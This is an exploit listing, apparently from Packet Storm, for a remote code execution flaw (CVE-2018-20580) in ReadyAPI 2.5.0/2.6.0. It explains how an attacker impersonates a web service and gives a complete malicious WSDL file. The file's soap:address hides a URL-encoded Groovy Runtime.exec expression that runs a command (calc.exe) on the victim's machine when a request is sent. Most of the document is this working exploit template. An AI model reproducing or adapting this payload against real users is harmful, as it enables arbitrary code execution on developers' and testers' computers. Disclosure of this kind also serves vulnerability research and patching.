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HistoryMay 06, 2019 - 12:00 a.m.

ReadyAPI 2.5.0 / 2.6.0 Remote Code Execution

2019-05-0600:00:00
Gilson Camelo
packetstormsecurity.com
56

EPSS

0.204

Percentile

96.4%

`<!--  
# Exploit Title: ReadyAPI Remote Code Execution Vulnerability.  
# Date: May, 2019  
# Exploit Author: Gilson Camelo => https://twitter.com/gscamelo  
# Vendor Homepage: https://smartbear.com/product/ready-api  
# Software Link: https://smartbear.com/product/ready-api/overview/  
# Github: https://github.com/gscamelo/CVE-2018-20580  
# Version: 2.5.0 and 2.6.0  
# Tested on: Windows  
# CVE : CVE-2018-20580  
  
I found a new vulnerability in the (ReadyAPI). It allows an attacker to  
execute a remote code on the local machine putting in danger the ReadyAPI  
users including developers, pentesters, etc...  
  
The ReadyAPI allows users to open a SOAP project and import WSDL files that  
help the users to communicate with the remote server easily.  
  
The WSDL file owner can determine default values of some parameters. An  
attacker can impersonate a legitimate web service and inject a malicious  
code into a default value of one of the parameters and spread it to  
ReadyAPI clients.  
  
When a ReadyAPI client load a malicious WSDL file to his project and send a  
request containing the malicious code the ReadyAPI will execute the  
malicious code on the victim's computer.  
  
The attack scenario:  
  
An attacker impersonates a regular web service with a WSDL containing the  
malicious code.  
The victim creates a new project in the ReadyAPI and loads the malicious  
WSDL File.  
The victim decides to send a request to the remote server and the ReadyAPI  
execute the malicious code.  
The attacker succeeds in executing malicious code in the victim's machine  
and take it over.  
-->  
  
<?xml version="1.0" encoding="UTF-8"?>  
<wsdl:definitions  
xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"  
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"  
xmlns:tns="http://example.com/stockquote.wsdl"  
xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  
xmlns:s="http://www.w3.org/2001/XMLSchema"  
xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"  
targetNamespace="http://example.com/stockquote.wsdl"  
xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">  
  
<wsdl:types>  
<s:schema elementFormDefault="qualified" targetNamespace="http://example.com/stockquote.wsdl">  
<s:element name="Malicious_Request">  
<s:complexType>  
<s:sequence>  
<s:element name="Payload" default="PWNED" type="s:string" />  
</s:sequence>  
</s:complexType>  
</s:element>  
  
</s:schema>  
</wsdl:types>  
<wsdl:message name="Malicious_RequestSoapIn">  
<wsdl:part name="parameters" element="tns:Malicious_Request" />  
</wsdl:message>  
  
<wsdl:portType name="Exploit">  
<wsdl:operation name="Malicious_Request">  
<wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">Create a new xpl</wsdl:documentation>  
<wsdl:input message="tns:Malicious_RequestSoapIn" />  
<wsdl:output message="tns:Malicious_RequestSoapOut" />  
</wsdl:operation>  
</wsdl:portType>  
  
<wsdl:binding name="Exploit" type="tns:Exploit">  
<soap:binding transport="http://schemas.xmlsoap.org/soap/http" />  
<wsdl:operation name="Malicious_Request">  
<soap:operation soapAction="https://www.test.com.br/Malicious_Request" style="document" />  
<wsdl:input>  
<soap:body use="literal" />  
</wsdl:input>  
<wsdl:output>  
<soap:body use="literal" />  
</wsdl:output>  
</wsdl:operation>  
</wsdl:binding>  
  
<wsdl:service name="XPL">  
<wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">My first Exploit</wsdl:documentation>  
<wsdl:port name="Exploit" binding="tns:Exploit">  
<soap:address location="http%3A%2F%2F127.0.0.1%2F%24%7B%3DRuntime.getRuntime%28%29.exec%28%27calc.exe%27%29%7D%3B" />  
</wsdl:port>  
  
</wsdl:service>  
</wsdl:definitions>  
`

EPSS

0.204

Percentile

96.4%